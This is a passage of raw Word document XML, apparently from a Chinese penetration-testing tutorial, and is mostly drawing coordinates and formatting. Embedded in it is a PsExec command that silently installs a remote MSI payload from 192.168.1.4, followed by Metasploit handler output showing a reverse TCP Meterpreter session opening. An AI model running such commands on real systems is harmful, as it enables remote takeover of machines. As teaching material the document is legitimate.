40,3598,11040,3597,11040,3596,11040,3595,11040,3593,11040,3592,11040,3591,11040,3589,11040,3588,11040,3587,11040,3585,11040,3584,11040,3582,11040,3581,11040,3579,11040,3577,11040,3576,11040,3574,11040,3572,11040,3570,11040,3569,11040,3567,11040,3565,11040,3563,11040,3561,11040,3559,11040,3557,11040,3555,11040,3552,11040,3550,11040,3548,11040,3546,11040,3543,11040,3541,11040,3539,11040,3536,11040,3534,11040,3531,11040,3528,11040,3526,11040,3523,11040,3520,11040,3517,11040,3515,11040,3512,11040,3509,11040,3506,11040,3506,11040,3506,11040,3506,11040,3506,11040,3506,11040,3506,11040,3506,11040,3506,11040,3506,11039,3506,11039,3506,11039,3506,11039,3506,11039,3506,11039,3506,11039,3506,11039,3506,11039,3506,11039,3506,11039,3506,11039,3506,11038,3506,11038,3506,11038,3506,11038,3506,11037,3506,11037,3506,11037,3506,11037,3506,11036,3506,11036,3506,11035,3506,11035,3506,11035,3506,11034,3506,11034,3506,11033,3506,11032,3506,11032,3506,11031,3506,11031,3506,11030,3506,11029,3506,11028,3506,11028,3506,11027,3506,11026,3506,11025,3506,11024,3506,11023,3506,11022,3506,11021,3506,11019,3506,11018,3506,11017,3506,11016,3506,11014,3506,11013,3506,11012,3506,11010,3506,11008,3506,11007,3506,11005,3506,11003,3506,11002,3506,11000,3506,10998,3506,10996,3506,10994,3506,10992,3506,10990,3506,10988,3506,10985,3506,10983,3506,10981,3506,10978,3506,10976,3506,10973,3506,10970,3506,10968,3506,10965,3506,10962,3506,10959,3506,10956,3506,10953,3506,10950,3506,10947,3506,10943,3506,10940,3506,10936,3506,10933,3506,10929,3506,10925,3506,10922,3506,10918,3506,10914,3506,10910,3506,10906,3506,10901,3506,10897,3506,10893,3506,10888,3506,10884,3506,10879,3506,10874,3506,10869,3506,10864,3506,10859,3506,10854,3506,10849,3506,10843,3506,10838,3506,10833,3506,10827,3506,10821,3506,10815,3506,10809,3506,10803,3506,10797,3506,10791,3506,10784e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:54.600pt;margin-top:593.400pt;width:467.400pt;height:115.800pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId14" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:453.874pt;margin-top:736.874pt;width:5.125pt;height:5.125pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="9077,14737" coordsize="102,102">
        <v:shape style="position:absolute;left:9077;top:14737;width:102;height:102" coordorigin="9077,14737" coordsize="102,102" path="m9194,14806l9194,14806,9194,14807,9194,14808,9194,14809,9194,14809,9194,14810,9194,14811,9193,14812,9193,14812,9193,14813,9193,14814,9193,14814,9193,14815,9193,14816,9193,14816,9193,14817,9193,14818,9193,14818,9193,14819,9192,14820,9192,14820,9192,14821,9192,14822,9192,14822,9192,14823,9192,14823,9191,14824,9191,14825,9191,14825,9191,14826,9191,14826,9191,14827,9190,14827,9190,14828,9190,14829,9190,14829,9190,14830,9189,14830,9189,14831,9189,14831,9189,14832,9188,14832,9188,14833,9188,14833,9187,14834,9187,14834,9187,14835,9187,14835,9186,14835,9186,14836,9186,14836,9185,14837,9185,14837,9185,14838,9184,14838,9184,14838,9184,14839,9183,14839,9183,14840,9183,14840,9182,14840,9182,14841,9181,14841,9181,14842,9181,14842,9180,14842,9180,14843,9179,14843,9179,14843,9178,14844,9178,14844,9178,14844,9177,14844,9177,14845,9176,14845,9176,14845,9175,14846,9175,14846,9174,14846,9174,14846,9173,14847,9173,14847,9172,14847,9172,14847,9171,14848,9171,14848,9170,14848,9170,14848,9169,14848,9168,14849,9168,14849,9167,14849,9167,14849,9166,14849,9166,14849,9165,14850,9164,14850,9164,14850,9163,14850,9162,14850,9162,14850,9161,14850,9161,14851,9160,14851,9159,14851,9159,14851,9158,14851,9157,14851,9157,14851,9156,14851,9155,14851,9154,14851,9154,14851,9153,14851,9152,14851,9152,14851,9151,14851,9150,14851,9149,14851,9149,14851,9149,14851,9148,14851,9147,14851,9146,14851,9146,14851,9145,14851,9144,14851,9143,14851,9143,14851,9142,14851,9141,14851,9141,14851,9140,14851,9139,14851,9139,14851,9138,14851,9137,14851,9137,14851,9136,14850,9135,14850,9135,14850,9134,14850,9134,14850,9133,14850,9132,14850,9132,14849,9131,14849,9130,14849,9130,14849,9129,14849,9129,14849,9128,14848,9128,14848,9127,14848,9127,14848,9126,14848,9125,14847,9125,14847,9124,14847,9124,14847,9123,14846,9123,14846,9122,14846,9122,14846,9121,14845,9121,14845,9121,14845,9120,14844,9120,14844,9119,14844,9119,14844,9118,14843,9118,14843,9117,14843,9117,14842,9117,14842,9116,14842,9116,14841,9115,14841,9115,14840,9115,14840,9114,14840,9114,14839,9114,14839,9113,14838,9113,14838,9113,14838,9112,14837,9112,14837,9112,14836,9111,14836,9111,14835,9111,14835,9110,14835,9110,14834,9110,14834,9109,14833,9109,14833,9109,14832,9109,14832,9108,14831,9108,14831,9108,14830,9108,14830,9107,14829,9107,14829,9107,14828,9107,14827,9107,14827,9106,14826,9106,14826,9106,14825,9106,14825,9106,14824,9106,14823,9105,14823,9105,14822,9105,14822,9105,14821,9105,14820,9105,14820,9105,14819,9105,14818,9104,14818,9104,14817,9104,14816,9104,14816,9104,14815,9104,14814,9104,14814,9104,14813,9104,14812,9104,14812,9104,14811,9104,14810,9104,14809,9104,14809,9104,14808,9104,14807,9104,14806,9104,14806,9104,14806,9104,14805,9104,14804,9104,14803,9104,14803,9104,14802,9104,14801,9104,14801,9104,14800,9104,14799,9104,14799,9104,14798,9104,14797,9104,14796,9104,14796,9104,14795,9105,14795,9105,14794,9105,14793,9105,14793,9105,14792,9105,14791,9105,14791,9105,14790,9106,14790,9106,14789,9106,14788,9106,14788,9106,14787,9106,14787,9107,14786,9107,14786,9107,14785,9107,14784,9107,14784,9108,14783,9108,14783,9108,14782,9108,14782,9109,14781,9109,14781,9109,14780,9109,14780,9110,14779,9110,14779,9110,14778,9111,14778,9111,14777,9111,14777,9112,14777,9112,14776,9112,14776,9113,14775,9113,14775,9113,14774,9114,14774,9114,14774,9114,14773,9115,14773,9115,14773,9115,14772,9116,14772,9116,14771,9117,14771,9117,14771,9117,14770,9118,14770,9118,14770,9119,14769,9119,14769,9120,14769,9120,14768,9121,14768,9121,14768,9121,14768,9122,14767,9122,14767,9123,14767,9123,14767,9124,14766,9124,14766,9125,14766,9125,14766,9126,14765,9127,14765,9127,14765,9128,14765,9128,14764,9129,14764,9129,14764,9130,14764,9130,14764,9131,14764,9132,14763,9132,14763,9133,14763,9134,14763,9134,14763,9135,14763,9135,14763,9136,14762,9137,14762,9137,14762,9138,14762,9139,14762,9139,14762,9140,14762,9141,14762,9141,14762,9142,14762,9143,14762,9143,14762,9144,14762,9145,14762,9146,14761,9146,14761,9147,14761,9148,14761,9149,14761,9149,14761,9149,14761,9150,14761,9151,14761,9152,14761,9152,14762,9153,14762,9154,14762,9154,14762,9155,14762,9156,14762,9157,14762,9157,14762,9158,14762,9159,14762,9159,14762,9160,14762,9161,14762,9161,14762,9162,14763,9162,14763,9163,14763,9164,14763,9164,14763,9165,14763,9166,14763,9166,14764,9167,14764,9167,14764,9168,14764,9168,14764,9169,14764,9170,14765,9170,14765,9171,14765,9171,14765,9172,14766,9172,14766,9173,14766,9173,14766,9174,14767,9174,14767,9175,14767,9175,14767,9176,14768,9176,14768,9177,14768,9177,14768,9178,14769,9178,14769,9178,14769,9179,14770,9179,14770,9180,14770,9180,14771,9181,14771,9181,14771,9181,14772,9182,14772,9182,14773,9183,14773,9183,14773,9183,14774,9184,14774,9184,14774,9184,14775,9185,14775,9185,14776,9185,14776,9186,14777,9186,14777,9186,14777,9187,14778,9187,14778,9187,14779,9187,14779,9188,14780,9188,14780,9188,14781,9189,14781,9189,14782,9189,14782,9189,14783,9190,14783,9190,14784,9190,14784,9190,14785,9190,14786,9191,14786,9191,14787,9191,14787,9191,14788,9191,14788,9191,14789,9192,14790,9192,14790,9192,14791,9192,14791,9192,14792,9192,14793,9192,14793,9193,14794,9193,14795,9193,14795,9193,14796,9193,14796,9193,14797,9193,14798,9193,14799,9193,14799,9193,14800,9193,14801,9193,14801,9194,14802,9194,14803,9194,14803,9194,14804,9194,14805,9194,14806,9194,14806,9194,14806,9194,14806,9194,14806,9194,14806,9194,14806,9194,14806,9194,14806,9194,14806,9194,14806,9194,14806,9194,14806,9194,14806,9194,14806,9194,14806,9194,14806,9194,14806,9194,14806,9194,14806,9194,14806,9194,14806,9194,14806,9194,14806,9194,14806,9194,14806,9194,14806,9194,14806,9194,14806,9194,14806,9194,14806,9194,14806,9194,14806,9194,14806,9194,14806,9194,14806,9194,14806,9194,14806,9194,14806,9194,14806,9194,14806,9194,14806,9194,14806,9194,14806,9194,14806,9194,14806,9194,14806,9194,14806,9194,14806,9194,14806,9194,14806,9194,14806,9194,14806,9194,14806,9194,14806,9194,14806,9194,14806,9194,14806,9194,14806,9194,14806,9194,14806,9194,14806,9194,14806,9194,14806,9194,14806,9194,14806,9194,14806,9194,14806,9194,14806,9194,14806,9194,14806,9194,14806,9194,14806,9194,14806,9194,14806,9194,14806,9194,14806,9194,14806,9194,14806,9194,14806,9194,14806,9194,14806,9194,14806,9194,14806,9194,14806,9194,14806,9194,14806,9194,14806,9194,14806,9194,14806,9194,14806,9194,14806,9194,14806,9194,14806,9194,14806,9194,14806,9194,14806,9194,14806,9194,14806,9194,14806,9194,14806,9194,14806,9194,14806,9194,14806,9194,14806,9194,14806,9194,14806,9194,14806,9194,14806,9194,14806,9194,14806,9194,14806,9194,14806,9194,14806,9194,14806,9194,14806,9194,14806,9194,14806,9194,14806,9194,14806,9194,14806,9194,14806e x" fillcolor="#000000" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:sectPr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324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43" w:lineRule="auto"/>
        <w:ind w:left="1495" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>PsExec.exe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21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3"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>-d</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21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1"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>-s</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21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1"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>msiexec.exe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21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1"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>/q</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21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1"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>/i</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId15" w:history="1">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
            <w:color w:val="003783"/>
            <w:spacing w:val="9"/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
            <w:u w:val="double" w:color="003783"/>
          </w:rPr>
          <w:t>http://192.168.1.4/Micro</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId16" w:history="1">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
            <w:color w:val="003783"/>
            <w:spacing w:val="12"/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
            <w:u w:val="double" w:color="003783"/>
          </w:rPr>
          <w:t>poor_rev_x86_msi_53.txt</w:t>
        </w:r>
      </w:hyperlink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331" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="346" w:lineRule="auto"/>
        <w:ind w:left="1705" w:right="5511" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="5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msf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exploit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(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multi</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="996c38"/>
          <w:spacing w:val="9"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="0076a9"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>handler</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="9"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="996c38"/>
          <w:spacing w:val="7"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&gt;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exploit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新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="13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3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="996c38"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="7"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>]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Started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reverse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TCP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0076a9"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>handler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0076a9"/>
          <w:spacing w:val="7"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>on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980053"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>192.168</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="980053"/>
          <w:spacing w:val="7"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="980053"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.4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:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="980053"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>53</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="129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4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="996c38"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="7"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>]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Sending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stage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989898"/>
          <w:spacing w:val="7"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="980053"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>179779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bytes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="7"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>)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0076a9"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>to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980053"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>192.168</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="980053"/>
          <w:spacing w:val="7"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="980053"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.119</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="114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5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="996c38"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>]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Meterpreter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0076a9"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>session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980053"/>
          <w:spacing w:val="8"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>11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opened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989898"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="980053"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>192.168</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="980053"/>
          <w:spacing w:val="8"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="980053"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:spacing w:val="7"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="980053"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>53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996c38"/>
          <w:spacing w:val="7"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>‐</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="996c38"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&gt;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980053"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>192.168</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="980053"/>
          <w:spacing w:val="8"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="980053"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.119</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:spacing w:val="8"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="980053"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>131</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="24" w:after="0" w:line="346" w:lineRule="auto"/>
        <w:ind w:left="1705" w:right="6366" w:firstLine="15"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="980053"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="32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at</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="32"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="980053"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>2019</w:t>
